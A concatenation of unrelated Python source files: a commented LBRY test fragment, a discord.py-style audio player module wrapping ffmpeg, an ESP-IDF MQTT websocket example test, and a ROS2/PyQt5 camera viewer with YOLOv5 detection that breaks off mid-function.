# yield delete_lbry_file(downloader)
# downloader = yield download_file(sd_hash)
# yield check_lbry_file(downloader)
# yield check_md5_sum()
# yield delete_lbry_file(downloader)
#
# def stop(arg):
# if isinstance(arg, Failure):
# logging.debug("Client is stopping due to an error. Error: %s", arg.getTraceback())
# else:
# logging.debug("Client is stopping normally.")
# kill_event.set()
# logging.debug("Set the kill event")
# d = self.wait_for_event(dead_event, 15)
#
# def print_shutting_down():
# logging.info("Client is shutting down")
#
# d.addCallback(lambda _: print_shutting_down())
# d.addCallback(lambda _: rm_db_and_blob_dir(db_dir, blob_dir))
# d.addCallback(lambda _: arg)
# return d
#
# d = self.wait_for_hash_from_queue(sd_hash_queue)
# d.addCallback(start_transfer)
# d.addBoth(stop)
# return d
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz
Copyright (c) 2021-present Awayume
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
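# Illustrative sketch (not part of the library): a minimal custom AudioSource.
# Per the read() contract above, a non-Opus source must return 20ms of 16-bit
# 48kHz stereo PCM per call, i.e. 48000 * 0.02 * 2 channels * 2 bytes = 3840 bytes:
#
#     class SilenceSource(AudioSource):
#         def read(self) -> bytes:
#             return b'\x00' * 3840  # one 20ms frame of silence
#
# Returning b'' instead signals that the stream has finished.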
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User-created AudioSources that use FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {'stdout': subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f'popen-stdin-writer:{id(self):#x}'
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
raise ClientException(executable + ' was not found.') from None
except subprocess.SubprocessError as exc:
raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
try:
proc.kill()
except Exception:
_log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
if proc.poll() is None:
_log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
proc.communicate()
_log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
else:
_log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = 'ffmpeg',
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
def is_opus(self) -> bool:
return False
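# Illustrative usage sketch (assumes a connected VoiceClient named voice_client;
# the file name is hypothetical):
#
#     source = FFmpegPCMAudio('song.mp3', options='-vn')
#     voice_client.play(source)
#
# With pipe=True the source is a file-like object fed to ffmpeg's stdin instead:
#
#     source = FFmpegPCMAudio(open('song.mp3', 'rb'), pipe=True)
#     voice_client.play(source)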
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = 'ffmpeg',
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
codec = 'copy' if codec in ('opus', 'libopus') else 'libopus'
args.extend(('-map_metadata', '-1',
'-f', 'opus',
'-c:a', codec,
'-ar', '48000',
'-ac', '2',
'-b:a', f'{bitrate}k',
'-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get('executable')
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or 'native'
executable = executable or 'ffmpeg'
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, '_probe_codec_' + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " \
f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data['streams'][0]
codec = streamdata.get('codec_name')
bitrate = int(streamdata.get('bit_rate', 0))
bitrate = max(round(bitrate/1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
args = [executable, '-hide_banner', '-i', source]
proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate(timeout=20)
output = out.decode('utf8')
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b'')
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
if original.is_opus():
raise ClientException('AudioSource must not be Opus encoded.')
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
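# Illustrative usage sketch (not part of the library; names are assumptions):
# wrap a PCM source to get runtime volume control.
#
#     source = PCMVolumeTransformer(FFmpegPCMAudio('song.mp3'), volume=0.5)
#     voice_client.play(source)
#     source.volume = 0.25  # can be adjusted while the audio is playing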
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception('Calling the after function failed.')
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f'Exception in voice thread {self.name}'
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
mqtt_ws_example_test.py
|
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import paho.mqtt.client as mqtt
from threading import Thread, Event
try:
import IDF
from IDF.IDFDUT import ESP32DUT
except Exception:
# this is a test case written with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` into sys.path before importing the FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
event_client_connected = Event()
event_stop_client = Event()
event_client_received_correct = Event()
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
event_client_connected.set()
client.subscribe("/topic/qos0")
def mqtt_client_task(client):
while not event_stop_client.is_set():
client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
global message_log
payload = msg.payload.decode()
if not event_client_received_correct.is_set() and payload == "data":
client.publish("/topic/qos0", "data_to_esp32")
if msg.topic == "/topic/qos0" and payload == "data":
event_client_received_correct.set()
message_log += "Received data:" + msg.topic + " " + payload + "\n"
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_ws(env, extra_data):
broker_url = ""
broker_port = 0
"""
steps: |
1. join AP and connects to ws broker
2. Test connects a client to the same broker
3. Test evaluates it received correct qos0 message
4. Test ESP32 client received correct qos0 message
"""
dut1 = env.get_dut("mqtt_websocket", "examples/protocols/mqtt/ws", dut_class=ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_websocket.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mqtt_websocket_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mqtt_websocket_size", bin_size // 1024)
# Look for host:port in sdkconfig
try:
value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
broker_url = value.group(1)
broker_port = int(value.group(2))
except Exception:
print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
raise
client = None
# 1. Test connects to a broker
try:
client = mqtt.Client(transport="websockets")
client.on_connect = on_connect
client.on_message = on_message
print("Connecting...")
client.connect(broker_url, broker_port, 60)
except Exception:
print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
raise
# Starting a py-client in a separate thread
thread1 = Thread(target=mqtt_client_task, args=(client,))
thread1.start()
try:
print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
if not event_client_connected.wait(timeout=30):
raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
dut1.start_app()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
print('ENV_TEST_FAILURE: Cannot connect to AP')
raise
print("Checking py-client received msg published from esp...")
if not event_client_received_correct.wait(timeout=30):
raise ValueError('Wrong data received, msg log: {}'.format(message_log))
print("Checking esp-client received msg published from py-client...")
dut1.expect(re.compile(r"DATA=data_to_esp32"), timeout=30)
finally:
event_stop_client.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mqtt_ws()
|
get_frame.py
|
from concurrent.futures import wait
import rclpy
from rclpy.node import Node
from rclpy.executors import SingleThreadedExecutor
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import Image
from Ui_untitled import Ui_MainWindow
from PyQt5 import QtWidgets,QtCore
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
import sys
import cv2
import time
import torch
import numpy as np
from threading import Thread
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super().__init__() # inherit QMainWindow's __init__
self.ui = Ui_MainWindow() # create the UI object
self.ui.setupUi(self) # run setupUi
self.camera = False # camera flag: whether the camera is open
self.detect = False # detect flag: whether to run YOLOv5 object detection
"""
stream_video_thread:
UI介面上的相機畫面必須在額外的線程執行,這樣才不會阻塞原本UI介面的線程
"""
self.stream_video_thread = StreamVideoThread() # 建立StreamVideoThread物件
self.stream_video_thread.img.connect(self.show_frame) # 將img值傳到show_frame涵式
self.stream_video_thread.fps.connect(self.update_fps) # 將fps值傳到show_frame涵式
self.stream_video_thread.delay.connect(self.update_delay) # 將delay值傳到show_frame涵式
self.stream_video_thread.start() # 開始執行StreamVideoThread線程
"""
count_time_thread:
建立一個用來計時的線程
"""
self.count_time_thread = Thread(target = self.count_time) #建立一個count_time_thread物件
self.count_time_thread.start() #開始執行count_time_thread線程
"""
btn_connect:
在初始化的時候建立UI介面上按鈕按下時所要觸發的對象
"""
self.btn_connect() # 執行btn_connect涵式
"""
使用torch從torch hub匯入yolov5程式和yolov5s模型,並且使用GPU裝置
"""
self.model = torch.hub.load('ultralytics/yolov5', 'yolov5s',device='0', force_reload=True) # 建立yolov5物件
"""
btn_connect:
設置UI介面上按鈕元件所要觸發的函數
"""
def btn_connect(self):
self.ui.camera_btn.clicked.connect(self.open_stream) # 當UI介面上的camera_btn物件被點擊時呼叫open_stream
self.ui.detect_checkbox.clicked.connect(self.checkbox_click_event) # 當UI介面上的detect_checkbox物件被點擊時呼叫checkbox_click_event
"""
checkbox_click_event:
當checkbox勾選時會進入checkbox_click_event函數,然後再判斷checkbox的狀態做對應的事
"""
def checkbox_click_event(self):
if self.ui.detect_checkbox.isChecked():
self.detect = True
else:
self.detect = False
"""
update_fps:
當camera的flag為"true"的時後設置UI介面上的fps_value物件的text屬性的值為fps值
當camera的flag為"false"的時後設置UI介面上的fps_value物件的text屬性的值為0
"""
def update_fps(self,fps):
if self.camera:
self.ui.fps_value.setText(str(fps))
else:
self.ui.fps_value.setText(str(0))
"""
update_delay:
當camera的flag為"true"的時後設置UI介面上的delay_value物件的text屬性的值為delay值
當camera的flag為"false"的時後設置UI介面上的delay_value物件的text屬性的值為0
"""
def update_delay(self,delay):
if self.camera:
self.ui.delay_value.setText(str(delay)+"ms")
else:
self.ui.delay_value.setText(str(0)+"ms")
"""
open_stream:
當camera的falg為"true"的時後則
當camera的falg為"false"的時後則
"""
def open_stream(self):
if not self.camera:
self.ui.detect_checkbox.setCheckable(True)
self.camera = True
else:
self.ui.detect_checkbox.setCheckable(False)
self.ui.detect_checkbox.setCheckState(False)
self.camera = False
"""
count_time:
當camera的flag為"true"的時後則計算時間,並且將time_value物件的text屬性設為計算後的值
當camera的flag為"false"的時後設置UI介面的time_value物件的text屬性為"00:00"
"""
def count_time(self):
s = 0
m = 0
while True:
if self.camera:
min, s = divmod(s, 60)
if min == 1:m+=1
self.ui.time_value.setText('{:02d}:{:02d}'.format(m, s))
s += 1
else:
self.ui.time_value.setText("00:00")
s = 0
m = 0
time.sleep(1)
"""
window_proportion:
先判斷camera的flag,
當camera的flag為"true"則再判斷detect的flag
當detect的flag為"true"則將影像傳入yolov5物件內做物件偵測,再將物件偵測後的影像透過cv2的resize將影像的解析度設置為640x480
當detect的flag為"false"則將影像直接透過cv2的resize將影像的解析度設置為640x480
當camera的flag為"false"則用numpy產生雜訊畫面
"""
def window_proportion(self,img):
w,h,_ = img.shape # get the image width, height and channel count
if self.camera:
if self.detect:
img = self.model(img)
img = img.render()[0]
img = cv2.resize(img,(640,480))
else :
img = np.random.randint(255, size=(640, 480, 3),dtype=np.uint8)
return img ,w ,h
"""
show_frame:
將影像設置在UI介面上的view_label上顯示,並且設置UI介面上resultion_value的text值
"""
def show_frame(self,img):
try:
img, w, h = self.window_proportion(img) # use window_proportion to prepare the frame for display
img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB) # use cv2.cvtColor to convert the channels from BGR to RGB
img = QImage(img,w,h,3*w,QImage.Format_RGB888) # use Qt's QImage to convert the image to Format_RGB888
self.ui.view_label.setGeometry(10,10,w+2,h+2) # set the size of the view_label widget
self.ui.view_label.setPixmap(QPixmap.fromImage(img)) # display the image on the view_label widget
self.ui.resultion_value.setText(f"{w}X{h}") # set resultion_value to the w and h values
except KeyboardInterrupt:
sys.exit()
class StreamVideoThread(QThread):
img = QtCore.pyqtSignal(np.ndarray)
fps = QtCore.pyqtSignal(int)
delay = QtCore.pyqtSignal(float)
def __init__(self):
super().__init__() # inherit QThread's __init__
rclpy.init() # initialize rclpy
self.get_frame_node = GetFrameNode() # create the GetFrameNode object
exe = SingleThreadedExecutor() # create the SingleThreadedExecutor object
exe.add_node(self.get_frame_node) # add get_frame_node to the SingleThreadedExecutor
self.get_img_thread = Thread(target=exe.spin,daemon=True) # create the get_img_thread object
self.get_img_thread.start() # start the get_img_thread thread
def run(self):
try:
while True:
img = self.get_frame_node.get_frames() # store the image returned by get_frame_node.get_frames in img
fps = self.get_frame_node.fps # store the fps value from get_frame_node in fps
delay = self.get_frame_node.delay # store the delay value from get_frame_node in delay
self.img.emit(img) # emit the image signal
self.fps.emit(fps) # emit the fps signal
self.delay.emit(delay) # emit the delay signal
time.sleep(0.1)
except KeyboardInterrupt:
sys.exit()
class GetFrameNode(Node):
def __init__(self):
super().__init__("jason_ros") # 繼承Node類的init,並設置ros節點名稱為Jason_ros
self.bridge = CvBridge() #建立cvbridge物件
msg_type = Image # subscription的訊息格式
name = "image_raw/uncompressed" # subscription的名子
sub = self.create_subscription(msg_type,name,self.listener_callback,10) #建立一個subscription
self.data = None # 用來存放節點收到的訊息
self.img = None # 用來存放訊息轉換成影像後的值
self.t1 = time.time() # 用來存放時間
self.delay = 0 # 用來存放時間延遲的值
self.fps = 0 # 用來存放fps值
sub # 執行subscription
def listener_callback(self, data):
self.data = data # store data in self.data
